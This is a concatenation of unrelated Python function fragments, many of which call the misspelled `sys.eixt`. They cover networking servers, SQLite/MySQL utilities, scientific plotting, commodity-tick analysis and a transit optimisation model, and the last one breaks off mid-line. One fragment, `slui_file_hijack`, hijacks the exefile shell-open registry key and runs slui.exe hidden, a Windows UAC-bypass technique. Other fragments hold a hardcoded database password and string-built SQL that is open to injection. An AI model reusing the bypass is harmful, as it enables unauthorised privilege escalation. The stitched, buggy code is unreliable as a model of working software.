def main(): sockfd = socket() sockfd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) sockfd.bind(ADDR) sockfd.listen(3) print("Listen the port 8888...") #处理僵尸进程 signal.signal(signal.SIGCHLD, signal.SIG_IGN) while True: try: connfd, addr = sockfd.accept() except KeyboardInterrupt: sockfd.close() sys.eixt("服务器退出") except Exception: print("服务器异常:", e) continue print("连接客户端:", addr) #创建子进程 pid = os.fork() if pid == 0: #处理具体的客户端事物 sockfd.close() ftp = FtpServer() while True: data = connfd.recv(1024).decode() if data == 'list': ftp.do_list() os._exit(0) else: connfd.close()
def get_uart_name(): while True: sys.stdout.write("\033[2J") sys.stdout.write('\033[0;0H') port_list = [] index = 0 print('串口序号表') print('=================================') for n, (port,desc, hwid) in enumerate(sorted(comports()),1): port_list.append(port) print('序号:{} 名称{}'.format(index, port)) index+=1 print('==================================') if len(port_list) == 0: print('Please connect uart to computer.') sys.exit() try: id = input('序号:') if type(id) == str: try: id = int(id) except: continue if id < len(port_list): return port_list[id] else: print('2:id < {}'.format(len(port_list))) else: print('1:id < {}'.format(len(port_list))) except KeyboardInterrupt: sys.eixt() except: sys.exit()
def create(what): '''Adding an entry into selected table''' path = os.path.abspath(contacts.__file__) path = os.path.split(path)[0] conn =foo.create_connection(os.path.join (path, 'database/libr.db' )) if not conn: return None if what == 'contact'.lower(): l_n = interf.get_any('Enter last name (mendatory): ') if l_n == 'q': sys.exit('Canceled') f_n = str(raw_input('Enter first name : ')) if f_n == 'q': sys.exit('Canceled') t_n = interf.get_int('Enter telefon number (mendatory): ') if t_n == 'q': sys.exit('Canceled') e_a = str(raw_input('Enter e-mail adress: ')) if e_a == 'q': sys.eixt('Canceled') query = (l_n, f_n, t_n, e_a) i = foo.create_contact(conn, query) else: g_n = interf.get_any('Enter group name (mendatory): ') if g_n == 'q': sys.exit ('Canceled') query = (g_n,) i = foo.create_group(conn, query) if i: sys.exit('Done!')
def write(self, physical_time): with open(self.fpath, 'a') as f: for field in self.fields: if field.mesh != self.mesh: sys.eixt('mesh in field "{:s}" not correspond to mesh in Output object'.format(self.fpath)) cells = self.mesh.cells f.write('$ElementData\n') f.write('1\n') f.write('"%s"\n'%field.name) f.write('1\n') f.write('%f\n'%physical_time) for i in [3, self.nwrite, 1, len(cells)]: f.write('%i\n'%i) # write the x,y,value # for i in range(len(cells)): f.write( '%i %f\n'%(cells[i].elem.i, field.new[i])) f.write('$EndElementData\n') # END of write of one field self.nwrite += 1
def find_interface(rho, sigma, debug=False): rho_s = gaussian_filter(rho, sigma=sigma, mode="wrap") nrows = rho_s.shape[0] xh = np.zeros(nrows) rho_h = np.zeros(nrows) if debug: plt.imshow(rho_s.T, origin="lower", interpolation="none") plt.show() plt.close() # find starting index start_row = None idx_max_pre = np.argmax(np.mean(rho_s, axis=0)) for row, rhox in enumerate(rho_s): idx_max, idx_h = find_idx_max(rhox, idx_max_pre, mode=2) if idx_max is not None: start_row = row idx_max_pre = idx_max xh[row], rho_h[row] = find_rho_half(rhox, idx_max, idx_h) break if idx_max is None: for row, rhox in enumerate(rho_s): idx_max, idx_h = find_idx_max(rhox, idx_max_pre, mode=1) if idx_max is not None: start_row = row idx_max_pre = idx_max xh[row], rho_h[row] = find_rho_half(rhox, idx_max, idx_h) break if idx_max is None: print("Cannot find the starting row.") sys.eixt() # find xh, rho_h for each row for row in range(start_row + 1, start_row + nrows): if row >= nrows: row -= nrows rhox = rho_s[row] idx_max = find_idx_max(rhox, idx_max_pre) if debug: print("row = ", row) if debug and row > 1950: is_debug = True else: is_debug = False xh[row], rho_h[row] = find_rho_half(rhox, idx_max, xh_pre=xh[row - 1], rho_h_pre=rho_h[row - 1], debug=is_debug) idx_max_pre = idx_max if debug: mask = rho_s > 1 plt.imshow(mask.T, origin="lower", interpolation="none") yh = np.linspace(0.5, nrows - 0.5, nrows) plt.plot(yh, xh, "k") plt.show() plt.close() return xh, rho_h
def _check_events(self): for event in pygame.event.get(): if event.type == pygame.QUIT: sys.eixt() elif event.type == pygame.KEYDOWN: self._check_keydown_events(event) elif event.type == pygame.KEYUP: self._check_keyup_events(event)
def main(): need_print = False count = None try: opts, args = getopt.getopt(sys.argv[1:], "c:p", ["count", "print"]) except getopt.GetoptError: sys.eixt(2) for opt, arg in opts: if opt in ("-c", "--count"): count = arg elif opt in ("-p", "--print"): need_print = True print ("count is:",count,", need_print is:", need_print) # open db db = MySQLdb.connect(host = "localhost", user = "******", passwd="wawdsh1!") # get cursor cursor = db.cursor() # show version # cursor.execute("select version()") # print ("version: %s") % cursor.fetchone() # cursor.execute("show databases") # rows = cursor.fetchall() # for data in rows: # print (data) cursor.execute("use test_db") #cursor.execute("create table tb2 (name varchar(20), sex char(1), birth date, death date)") for i in range( int(count) ): name = generate_randname(10) birth = generate_randdate('1980-01-01','2000-12-31') death = generate_randdate(birth,'2030-12-31') sex = generate_sex() sql = "insert into tb2 values ('%s','%s','%s','%s')" % (name,sex,birth,death) if need_print: print sql cursor.execute(sql) time.sleep(0.05) # execute db.commit() # close cursor cursor.close() # close db db.close() print ("succeed")
def LM(self, commodity='rb', exp_list=['1701'], offset=0, freq='5min', flg='train'): # dictionary to save word counts for each commodity word_counts_dict = {} for l in np.arange(1, self._n): word_counts_dict[l] = {self.ternary(k, l): 0 for k in np.arange(self._m ** l)} print('=' * 12 + commodity + ' ' + flg + '=' * 12) data_path = self._data_root_dir + '/' + commodity # for exp_date in sorted(list(set([x[2:6] for x in os.listdir(data_path+'/day')]))): for exp_date in exp_list: print('-' * 10 + 'Running:' + exp_date + '-' * 10) instrument = commodity + exp_date tick_day = df_reader(instrument + '*', topdir=data_path + '/day', offset=offset, freq=freq, day=True, symbol=commodity).get_tick(raw=False) tick_night = df_reader(instrument + '*', topdir=data_path + '/night', offset=offset, freq=freq, day=False, symbol=commodity).get_tick(raw=False) tick_all = pd.concat([tick_day, tick_night]) tick_all.sort_index(inplace=True) tick_all.to_csv(self._output + '/' + '_'.join([commodity, exp_date, freq, str(offset)]) + '.csv') # select train data: hard coded. if flg == 'train': tick_all = tick_all[tick_all.index < '2016-7-1 09:00:00.0'] elif flg == 'valid': tick_all = tick_all[ (tick_all.index >= '2016-7-1 09:00:00.0') & (tick_all.index < '2016-10-1 09:00:00.0')] else: print('Unknown flg') sys.eixt() tick_all['Direction'] = tick_all['LastPrice'].pct_change().apply( lambda x: 2 if x > 0 else (1 if x < 0 else 0)) tick_all_sequence = tick_all['Direction'].astype(str).str.cat() # print(tick_all_sequence) for l in np.arange(1, self._n): for k in np.arange(self._m ** l): word_counts_dict[l][self.ternary(k, l)] += df_reader.count_word(tick_all_sequence, self.ternary(k, l)) word_prob_all = pd.DataFrame() for l in np.arange(1, self._n): tmp = self.word_prob(word_counts_dict[l], l) word_prob_all = word_prob_all.append(tmp) word_prob_all = word_prob_all[['prior', '0', '1', '2', 'total', 'max', 'max_pct']] word_prob_all['offset'] = offset # print (word_prob_all) return word_prob_all
def list(some_module): if some_module == "template": for i in template_choices: print(i) elif some_module == "alloc": for i in alloc_choices: print(i) else: print("There is no such option") sys.eixt()
def __init__(self, date=None): if date is not None: self.dbname = "".join([DB_PATH, date, ".db"]) print self.dbname else: raise (ValueError, "date needed!!") if not os.path.isfile(self.dbname): self.conn = sqlite3.connect(self.dbname, 20) self.conn.text_factory = str cur = self.conn.cursor() cur.execute( """ CREATE TABLE crash_info ( id INTEGER PRIMARY KEY AUTOINCREMENT, hash_value TEXT NOT NULL, info TEXT NOT NULL, times INTEGER NOT NULL, status INTEGER, author TEXT ); """ ) cur.execute( """ CREATE TABLE hash_info ( id INTEGER PRIMARY KEY AUTOINCREMENT, hash_value TEXT NOT NULL, count INTEGER NOT NULL);""" ) cur.execute( """ CREATE TABLE update_info ( id INTEGER PRIMARY KEY AUTOINCREMENT, update_time REAL NOT NULL);""" ) self.conn.commit() # store the new db info into the all_db_info database all_db_name = "".join([DB_PATH, "all_db_info.db"]) if not os.path.isfile(all_db_name): print "Wrong db file: %s" % all_db_name sys.eixt(1) db = sqlite3.connect(all_db_name, 2) db.text_factory = str cur = db.cursor() cur.execute( "insert into all_db_info (dbdate,dbname,create_time) values (?,?,?)", (time.mktime(time.strptime(date, "%Y-%m-%d")), self.dbname, date), ) db.commit() db.close() else: self.conn = sqlite3.connect(self.dbname) self.conn.text_factory = str
def __init__(self, mesh, fpath, *fields): self.mesh = mesh self.fpath = fpath self.fields = [] self.nwrite = 0 try: f = open(self.fpath, 'w') with open(self.mesh.fpath, 'r') as fmesh: f.write(fmesh.read()) f.close() except IOError: sys.eixt('Can Not open file:\n{0:s}'.format(self.fpath)) for phi in fields: self.fields.append(phi)
def getMainContent(): "获取主贴内容,默认为本地1开头的第一个shtml" #if len(d_value) == 0 : return with open('./html/1.shtml','rb') as f: html = f.read() res = re.findall(r'<div class="bbs-content clearfix">(.*?)</div>',html,re.S) if not len(res): sys.exit('楼主主贴没有获取到内容...') elif len(res) > 1: sys.eixt('楼主主贴获取的内容超过一个...') global _main_body with open('./txt/mainContent.txt','wb') as f: #f.write(formatHtml(res[0])) res = formatHtml(res[0]) f.write(res)
def load_resource_general_doc_based(dataset_dirpath,training_map,args): """ Load dataset from specified preprocessed json file. file path is specified by additional_resource_list RETURN: map training_map {unicode label: list document[list [unicode token]]} """ additional_training_map={}; #------------------------------------------------------------ if level==1: for alphabet in alphabetTable: additional_training_map[alphabet]=[]; additional_training_map[u'NOT_'+alphabet]=[]; elif level==2: sys.eixt('not implemented yet'); #------------------------------------------------------------ f_list=make_filelist(dataset_dirpath); #------------------------------------------------------------ for fileindex,filepath in enumerate(f_list): with codecs.open(filepath,'r','utf-8') as f: file_obj=json.load(f); alphabet_label_list=file_obj['labels']; alphabet_label_list=[label_converter(label) for label in alphabet_label_list]; print filepath print alphabet_label_list doc=file_obj['doc_str']; if args.ins_range=='document': additional_training_map=generate_document_instances(doc,filepath,alphabetTable,alphabet_label_list,additional_training_map,args); """ elif args.ins_range=='sentence': #arowを用いた半教師あり学習のために文ごとの事例作成を行う additional_training_map=generate_sentence_instances(doc,filepath,alphabetTable,alphabet_label_list,dfd_training_map,args); """ if args.dev==True and fileindex==dev_limit: break; #------------------------------------------------------------ for label in additional_training_map: if label in training_map: training_map[label]+=additional_training_map[label]; else: training_map[label]=additional_training_map[label]; #------------------------------------------------------------ return training_map;
def collect_db_info(dbname, dbdate): if not os.path.isfile(dbname): print "Wrong db file: %s" % dbname sys.eixt(1) db = "".join([DB_PATH, "all_db_info.db"]) if not os.path.isfile(db): print "Wrong db file: %s" % dbname sys.eixt(1) db = sqlite3.connect(db, 2) db.text_factory = str cur = db.cursor() cur.execute( "insert into all_db_info (dbdate,dbname,create_time) values (?,?,?)", (time.mktime(time.strptime(dbdate, "%Y-%m-%d")), dbname, dbdate), ) db.commit() db.close() print "insert all_db_info (%s)" % dbname
def load_dfd(training_map,args): """ Load DFD dataset from preprocessed json file. DFD file path is specified by dfd_dir_path RETURN: map training_map {unicode label: list document[list [unicode token]]} """ dfd_training_map={}; #------------------------------------------------------------ if level==1: #Initialize dfd_training_map with 23 labels #alphabetTable=[unichr(i) for i in xrange(65, 91)if chr(i) not in [u'I',u'O',u'Y']] for alphabet in alphabetTable: dfd_training_map[alphabet]=[]; dfd_training_map[u'NOT_'+alphabet]=[]; elif level==2: sys.eixt('not implemented yet'); #------------------------------------------------------------ dfd_f_list=make_filelist(dfd_dir_path); #------------------------------------------------------------ for fileindex,filepath in enumerate(dfd_f_list): with codecs.open(filepath,'r','utf-8') as f: file_obj=json.load(f); alphabet_label_list=file_obj['labels']; doc=file_obj['doc_str']; if args.ins_range=='document': dfd_training_map=generate_document_instances(doc,filepath,alphabetTable,alphabet_label_list,dfd_training_map,args); elif args.ins_range=='sentence': #arowを用いた半教師あり学習のために文ごとの事例作成を行う dfd_training_map=generate_sentence_instances(doc,filepath,alphabetTable,alphabet_label_list,dfd_training_map,args); if args.dev==True and fileindex==dev_limit: break; #------------------------------------------------------------ for label in dfd_training_map: if label in training_map: training_map[label]+=dfd_training_map[label]; else: training_map[label]=dfd_training_map[label]; #------------------------------------------------------------ return training_map;
def ask_what_you_need(): print("-" * 20) print(""" S|s to store file in database L|l to load file from database Q|q to quit """) print("-" * 20) user = input("Enter what you whant :") choices = { "s": func_to_save_file_in_database, "l": func_to_load_file_from_database } if user.lower() in choices.keys(): choices[user.lower()]() else: sys.eixt()
def process(conn): # read userInput from client userInput = conn.recv(BUFFER_SIZE) if not userInput: print "Error reading message\n" sys.exit(1) userInput = userInput.strip() mylist = userInput.split(" ") if len(mylist) != 3: print "Input format incorrect!\n" sys.eixt(1) print "Received message: ", userInput # TODO: add convertion function here, reply = func(userInput) print mylist reply = tfunction(mylist) print reply if reply == (-1): conn.send("Input format incorrect!\n") else: conn.send('%s' % reply) conn.close()
def main(): args = parse_args() infh = fileinput.input(files=args.input) for line in infh: line = line.rstrip('\n') if args.field: line_lst = line.split(args.delimiter) if args.action == '01': line_lst[args.field - 1] = aa01(line_lst[args.field - 1]) elif args.action == '10': line_lst[args.field - 1] = aa01(line_lst[args.field - 1]) elif args.action == '13': line_lst[args.field - 1] = aa13(line_lst[args.field - 1]) elif args.action == '31': line_lst[args.field - 1] = aa31(line_lst[args.field - 1]) elif args.action == '03': line_lst[args.field - 1] = aa03(line_lst[args.field - 1]) elif args.action == '30': line_lst[args.field - 1] = aa30(line_lst[args.field - 1]) else: sys.eixt('Error: invalid action.') line = args.delimiter.join([line_lst]) else: if args.action == '01': line = aa01(line) elif args.action == '10': line = aa01(line) elif args.action == '13': line = aa13(line) elif args.action == '31': line = aa31(line) elif args.action == '03': line = aa03(line) elif args.action == '30': line = aa30(line) else: sys.eixt('Error: invalid action.') print(line, file=sys.stdout, flush=True) infh.close()
def read_thread_func(queue): message_number = 0 while True: #read the message length (first 4 bytes). text_length_bytes = sys.stdin.read(4) if len(text_length_bytes) == 0: if queue: queue.put(None) sys.eixt(0) # Unpack message length as 4 byte integer. text_length = struct.unpack('i', text_length_bytes)[0] # Read the text (JSON object) of the message. text = sys.stdin.read(text_length).decode('utf-8') if queue: queue.put(text) else: # In headless mode just send an message. send_message('{msg:WJJDKDKKDKK}')
def slui_file_hijack(): if (os.path.isfile(os.path.join("c:\windows\system32\slui.exe")) == True): try: key = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER,"Software\Classes\exefile\shell\open\command") _winreg.SetValueEx(key,None,0,_winreg.REG_SZ,cmd_path()) _winreg.CloseKey(key) except Exception as error: return False try: win32api.ShellExecute(0,None,"c:\windows\system32\slui.exe",None,None,win32con.SW_HIDE) except Exception as error: sys.exit() time.sleep(5) try: _winreg.DeleteKey(_winreg.HKEY_CURRENT_USER,"Software\Classes\exefile\shell") except Exception as error: return False else: sys.eixt()
def main(): if len(sys.argv) == 3: p = int(sys.argv[1]) # 101 q = int(sys.argv[2]) # 163 else: p = 101 q = 163 print('p: ' + str(p)) print('q: ' + str(q)) if p * q < 256: sys.eixt('p * q debe ser mayor que 256') e = 65537 e = 257 print('e: ' + str(e)) # compute n n = p * q # Compute phi(n) phi = (p - 1) * (q - 1) #rint('phi:' + str(phi)) # Compute modular inverse of e gcd, a, b = egcd(e, phi) d = a # en el codigo da 0x01fbd521 por alguna razon... if (e * d) % phi != 1: print('(e * d) % phi = ' + str((e * d) % phi)) #if e < phi: # print('e < phi') #if d < phi: # print('d < phi') print('d: ' + str(d))
def LM(self, commodity='rb', exp_list=['1701'], offset=0, freq='5min', flg='train'): # dictionary to save word counts for each commodity word_counts_dict = {} for l in np.arange(1, self._n): word_counts_dict[l] = { self.ternary(k, l): 0 for k in np.arange(self._m**l) } print('=' * 12 + commodity + ' ' + flg + '=' * 12) data_path = self._data_root_dir + '/' + commodity #for exp_date in sorted(list(set([x[2:6] for x in os.listdir(data_path+'/day')]))): tick_maj = pd.DataFrame() for exp_date in exp_list: tick_tmp = pd.DataFrame() print('-' * 10 + 'Running:' + exp_date + '-' * 10) instrument = commodity + exp_date tick_day = df_reader(instrument + '*', topdir=data_path + '/day', offset=offset, freq=freq, day=True, symbol=commodity).get_tick(raw=False) tick_night = df_reader(instrument + '*', topdir=data_path + '/night', offset=offset, freq=freq, day=False, symbol=commodity).get_tick(raw=False) tick_all = pd.concat([tick_day, tick_night]) tick_all.sort_index(inplace=True) tick_all.to_csv(self._output + '/' + '_'.join([commodity, exp_date, freq, str(offset)]) + '.csv') #exp_date_tmp = '20'+exp_date+'15'+' 09:00:00.0' year_month = '20' + exp_date year_month_int = int(year_month) year_int = year_month_int // 100 month_int = year_month_int % 100 month_tot = year_int * 12 + month_int sel_start = '2016-1-1 09:00:00.0' sel_end = '2016-1-1 09:00:00.0' if (year_month_int > 201602): month_tot = month_tot - 2 year_int = month_tot // 12 month_int = month_tot % 12 if month_int == 0: year_int = year_int - 1 month_int = 12 _, num_days = calendar.monthrange(year_int, month_int) sel_start = str(year_int) + '-' + str( month_int) + '-1 09:00:00.0' sel_end = str(year_int) + '-' + str(month_int) + '-' + str( num_days) + ' 23:59:59.0' print("select data of " + exp_date + " start from " + sel_start + " to " + sel_end) if (self._sel_mode == 'MajorContract'): tick_tmp = tick_all[(tick_all.index < sel_end) & (tick_all.index > sel_start)] # select train data: hard coded. if flg == 'train': tick_all = tick_all[(tick_all.index < '2016-7-1 09:00:00.0')] elif flg == 'valid': tick_all = tick_all[(tick_all.index >= '2016-7-1 09:00:00.0') & (tick_all.index < '2016-10-1 09:00:00.0')] else: print('Unknown flg') sys.eixt() print('total lines: ' + str(tick_all.shape[0]) + ', with ' + str(tick_tmp.shape[0]) + ' lines selected as major contract') tick_maj = tick_maj.append(tick_tmp) tick_maj.to_csv(self._output + '/' + '_'.join([commodity, freq, exp_date, str(offset)]) + 'part.csv') tick_all['Direction'] = tick_all['LastPrice'].pct_change().apply( lambda x: 2 if x > 0 else (1 if x < 0 else 0)) tick_all_sequence = tick_all['Direction'].astype(str).str.cat() #print(tick_all_sequence) for l in np.arange(1, self._n): for k in np.arange(self._m**l): word_counts_dict[l][self.ternary( k, l)] += df_reader.count_word(tick_all_sequence, self.ternary(k, l)) word_prob_all = pd.DataFrame() tick_maj.to_csv( self._output + '/' + '_'.join([commodity, freq, str(offset)]) + 'all.csv') for l in np.arange(1, self._n): tmp = self.word_prob(word_counts_dict[l], l) word_prob_all = word_prob_all.append(tmp) word_prob_all = word_prob_all[[ 'prior', '0', '1', '2', 'total', 'max', 'max_pct' ]] word_prob_all['offset'] = offset # print (word_prob_all) return word_prob_all
def dynamic_schedule_based_ue_model(tn): """ Input TimeExpandedNetwork obj; output the time-dependent equilibrium flow.""" print(' ---------------------------------------------------') print(" Time-dependent model begins ...") # Parameters TEST_QUADRATIC_PROG = int(open_config_file('test_quadratic_programming')) QUADRATIC_PROG_SOLVING_PKG = open_config_file('QUADRATIC_PROG_SOLVING_PKG') INTEGER_PROG = float(open_config_file('INTEGER_PROG')) # Number of stops N = len(tn.stops) # Horizon T = tn.T MAX_NUMBER_OF_ITERATIONS = int( open_config_file('MAX_NUMBER_OF_ITERATIONS_FOR_BILEVEL_MODEL')) CONVERGENCE_CRITERION = float( open_config_file('CONVERGENCE_CRITERION_FOR_BILEVEL_MODEL')) # Number of bus lines. num_routes = len(tn.routes) # The most number of choices user could have at a node, which equals # the number of routes, adding a waiting link. num_choices = num_routes + 1 # Periods of measurements (Unit: min) C = int(open_config_file('MEASUREMENT_PERIOD')) # Times of measurements I = int(T / C) sys.setrecursionlimit(5000000) global m print() print(" Horion (T): " + str(T)) print(" Measurements period C: " + str(C)) print(" Times of measurements I: " + str(I)) print(" Optimization package: " + QUADRATIC_PROG_SOLVING_PKG) # Initialization od_flow = np.zeros((N, N, T)) # Input Data # Count data. entry_count = [] exit_count = [] wifi_count = [] passby_count = [] # Retain only data column. entry_count_file = open_data_file_with_header( 'data/entry_count_by_designated_period.csv') exit_count_file = open_data_file_with_header( 'data/exit_count_by_designated_period.csv') wifi_count_file = open_data_file_with_header( 'data/wifi_count_by_designated_period.csv') # Data formats: # (col) 1 2 3 # measurement_seq_number, stop_id, count # Retain only count data. entry_count = [float(item[2]) for item in entry_count_file] exit_count = [float(item[2]) for item in exit_count_file] wifi_count = [float(item[2]) for item in wifi_count_file] # Convert wifi count to stop count. # i) First, import ratio file. wifi_sample_ratio = open_data_file_with_header( 'data/wifi_sample_ratio.csv') # Table header: # 0 # sample_ratio wifi_sample_ratio = [float(item[0]) for item in wifi_sample_ratio] # ii) Second, transform. passby_count = [] for k_meas in range(I): for i_stop in range(N): # Note: wifi_count is list passby_count.append(wifi_count[k_meas * N + i_stop] / wifi_sample_ratio[i_stop]) # Print measurements data. if TEST_QUADRATIC_PROG == 1: print() print(' Measurements data:') print(' entry_count:') print(entry_count) print(' exit_count:') print(exit_count) print(' wifi_count:') print(wifi_count) print(' wifi_sample_ratio:') print(wifi_sample_ratio) print(' passby_count:') print(passby_count) # End of test print. # Prepare coefficients for solve quadratic programming # Non-integer prog if QUADRATIC_PROG_SOLVING_PKG == "cvxopt": # Coefficients: Q,p,A,b,G,h # Q & p Q = np.zeros((N * N * T + 3 * N * T, N * N * T + 3 * N * T)) p = np.zeros((N * N * T + 3 * N * T, 1)) # period k_meas for k_meas in range(I): # stop n for i_stop in range(N): for t1 in range(C * k_meas, C * (k_meas + 1)): for t2 in range(C * k_meas, C * (k_meas + 1)): Q[N * N * T + N * t1 + i_stop, N * N * T + N * t2 + i_stop] = 2 Q[N * N * T + N * T + N * t1 + i_stop, N * N * T + N * T + N * t2 + i_stop] = 2 Q[N * N * T + 2 * N * T + N * t1 + i_stop, N * N * T + 2 * N * T + N * t2 + i_stop] = 2 # p p[N * N * T + N * t1 + i_stop, 0] = (-2) * entry_count[N * k_meas + i_stop] p[N * N * T + N * T + N * t1 + i_stop, 0] = (-2) * exit_count[N * k_meas + i_stop] p[N * N * T + 2 * N * T + N * t1 + i_stop, 0] = (-2) * passby_count[N * k_meas + i_stop] # A # A will be fully determined in the iterations. # Initialized here. A = np.zeros((3 * N * T, N * N * T + 3 * N * T)) # b is zero as default. b = np.zeros((3 * N * T, 1)) # G # var >= 0, namely - var <= 0. G = (-1) * np.identity(N * N * T + 3 * N * T) # h is zero as default. h = np.zeros((N * N * T + 3 * N * T, 1)) # Transform numpy matrices to cvxopt matrices. Q = matrix(Q, tc='d') p = matrix(p, tc='d') G = matrix(G, tc='d') h = matrix(h, tc='d') b = matrix(b, tc='d') # Mixed integer prog. # Sparse model. elif QUADRATIC_PROG_SOLVING_PKG == "gurobi" and platform.system( ) != 'Windows': m = Model("qp") # Create variables # f_i_j_h for q_origin in range(N): for r_dest in range(N): for h_depart in range(T): if INTEGER_PROG == 1: exec( "f_%d_%d_%d = m.addVar(vtype=GRB.INTEGER, lb=0, name='f_%d_%d_%d')" % (q_origin, r_dest, h_depart, q_origin, r_dest, h_depart), globals()) elif INTEGER_PROG == 0: exec( "f_%d_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='f_%d_%d_%d')" % (q_origin, r_dest, h_depart, q_origin, r_dest, h_depart), globals()) # o_q_h for q_origin in range(N): for h_depart in range(T): exec( "o_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='o_%d_%d')" % (q_origin, h_depart, q_origin, h_depart), globals()) # d_r_t for r_dest in range(N): for t in range(T): exec( "d_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='d_%d_%d')" % (r_dest, t, r_dest, t), globals()) # x_i_t for i_stop in range(N): for t in range(T): exec( "x_%d_%d = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='x_%d_%d')" % (i_stop, t, i_stop, t), globals()) # Set objective obj_str = 'obj = ' for k_meas in range(I): # o_q_h for q_origin in range(N): temp_str = '(' for h_depart in range(C * k_meas, C * (k_meas + 1)): temp_str += 'o_' + str(q_origin) + '_' + str(h_depart) if h_depart != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str(entry_count[N * k_meas + q_origin]) temp_str += ')' obj_str += temp_str + '*' + temp_str obj_str += ' + ' # d_r_t for r_dest in range(N): temp_str = '(' for t in range(C * k_meas, C * (k_meas + 1)): temp_str += 'd_' + str(r_dest) + '_' + str(t) if t != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str(exit_count[N * k_meas + r_dest]) temp_str += ')' obj_str += temp_str + '*' + temp_str obj_str += ' + ' # x_i_t for i_stop in range(N): temp_str = '(' for t in range(C * k_meas, C * (k_meas + 1)): temp_str += 'x_' + str(i_stop) + '_' + str(t) if t != C * (k_meas + 1) - 1: temp_str += '+' temp_str += ' - ' + str(passby_count[N * k_meas + i_stop]) temp_str += ')' obj_str += temp_str + '*' + temp_str if not (i_stop == (N - 1) and k_meas == (I - 1)): obj_str += ' + ' if TEST_QUADRATIC_PROG == 1: print() print(" objective is:") print(obj_str) # End of test print. exec(obj_str, globals()) m.setObjective(obj, GRB.MINIMIZE) # Add constraints (part). count_constraint = 0 # o_q_h for q_origin in range(N): for h_depart in range(T): const_str = '' temp_count = 0 for r_dest in range(N): if r_dest != q_origin: if temp_count != 0: const_str += ' + ' const_str += 'f_' + str(q_origin) + '_' + str( r_dest) + '_' + str(h_depart) temp_count += 1 if temp_count > 0: const_str += ' == ' const_str += 'o_' + str(q_origin) + '_' + str(h_depart) if TEST_QUADRATIC_PROG == 1: print() print(" A entry count constraint is added: ") print(const_str) # End of test print. m.addConstr(eval(const_str), 'c' + str(count_constraint)) count_constraint += 1 # d_r_t # TBD # x_r_t # TBD elif QUADRATIC_PROG_SOLVING_PKG == "gurobi" and platform.system( ) == 'Windows': pass elif QUADRATIC_PROG_SOLVING_PKG != "cvxopt" and QUADRATIC_PROG_SOLVING_PKG != "gurobi": print() print(" Error: Unkown method!") sys.exit(1) print(' --------------------------') print(' Bi-level programming iterations begins ... ') # Bi-level programming iterations # Initialization iteration_count = 0 converg_flag = 0 # While convergence or maximum, iteration not reached, continue to loop. while converg_flag == 0: # Upper level print() print(" Bi-level iteration: " + str(iteration_count)) print(' Upper level begins ...') print(" Find initial od_flow_to_stop_prob...") # Initialize the cost of links for index in range(len(tn.links_exp)): tn.links_exp[index][8] = tn.links_exp[index][5] # Initialize od_flow_to_stop_prob. # Users will follow the path determined by the initial preference set. # No capacity constraints etc. considered. if iteration_count == 0: prefer_links_optimal, prefer_probs_optimal = find_initial_strategy( tn) od_flow_to_stop_prob = np.zeros((N, N, T, N, T)) for q_origin in range(N): for r_dest in range(N): if q_origin != r_dest: for h_depart in range(T): # Initialize departure node in TE network. # Notations inherated from dynamic_schedule_based_ue_assignment_algorithm. i = q_origin t = h_depart i_t = tn.stops_exp.index(tn.stops[q_origin] + '_' + str(h_depart)) # coming from route l = num_choices - 1 tau = h_depart arrive_dest_flag = 0 while arrive_dest_flag == 0: if TEST_QUADRATIC_PROG == 1: print() print(" Current [q,r,h]: " + str([q_origin, r_dest, h_depart]) + " current node: " + str(tn.stops_exp[i_t]) + " - " + str(i_t)) print(" prefer_links_optimal:") print(prefer_links_optimal[r_dest, l, tau, i_t]) # End of test print. # Update od_flow_to_stop_prob for current node. if i == q_origin and t == h_depart: od_flow_to_stop_prob[q_origin, r_dest, h_depart, i, t] = 1.0 if TEST_QUADRATIC_PROG == 1: print() print( " Entry count od_flow_to_stop_prob" + str([ q_origin, r_dest, h_depart, i, t ]) + " updated to 1.") # End of test print. if i == r_dest: od_flow_to_stop_prob[q_origin, r_dest, h_depart, i, t] = 1.0 if TEST_QUADRATIC_PROG == 1: print() print( " Exit count od_flow_to_stop_prob" + str([ q_origin, r_dest, h_depart, i, t ]) + " updated to 1.") # End of test print. if i != q_origin and i != r_dest and l != ( num_choices - 1): od_flow_to_stop_prob[q_origin, r_dest, h_depart, i, t] = 1.0 if TEST_QUADRATIC_PROG == 1: print() print( " Passby count od_flow_to_stop_prob" + str([ q_origin, r_dest, h_depart, i, t ]) + " updated to 1.") # End of test print. # Update arrive_dest_flag if needed. if i == r_dest: arrive_dest_flag == 1 if TEST_QUADRATIC_PROG == 1: print() print(" Arrive at destination.") # End of test print. break # Find next node. # If preference set not empty, which means it's able to get to the destination in T; if prefer_links_optimal[r_dest, l, tau, i_t]: link_next = prefer_links_optimal[r_dest, l, tau, i_t][0] l_next = tn.links_exp[link_next][1] i_t_next = tn.links_exp[link_next][3] i_next = tn.stops_exp_2[i_t_next][1] t_next = tn.stops_exp_2[i_t_next][2] if l_next == (num_choices - 1): tau_next = tau else: # Use TT to update tau. tau_next = t_next else: if TEST_QUADRATIC_PROG == 1: print() print( " This node cannot reach destination within horizon." ) # End of test print. break # Update node. i_t = i_t_next i = i_next t = t_next l = l_next tau = tau_next if QUADRATIC_PROG_SOLVING_PKG == "cvxopt": # A # Adopt od_flow_to_stop_prob matrix from assignment of last iteration to obtain A. # For enter measurement at node r_h_depart for h_depart in range(T): for q_origin in range(N): # flow var coeff for r_dest in range(N): A[N * h_depart + q_origin, N * N * h_depart + N * q_origin + r_dest] = 1 # Measurement var (O) coeff A[N * h_depart + q_origin, N * N * T + N * h_depart + q_origin] = -1 # For exit measurement at node s_t for t_exit in range(T): for r_dest in range(N): # flow var coeff for q_origin in range(N): for h_depart in range(t_exit): if q_origin != r_dest: A[N * T + N * t_exit + r_dest, N * N * h_depart + N * q_origin + r_dest] = od_flow_to_stop_prob[q_origin, r_dest, h_depart, r_dest, t_exit] # Measurement var (D) coeff # Remember to use t! A[N * T + N * t_exit + r_dest, N * N * T + N * T + N * t_exit + r_dest] = -1 # For passby measurement at node n_t for i_stop in range(N): for t_passby in range(T): # Q # Note that enter flows could also be detedted by wifi, hence here # h_depart range in 0 ~ t. for h_depart in range(t_passby): for q_origin in range(N): for r_dest in range(N): if i_stop 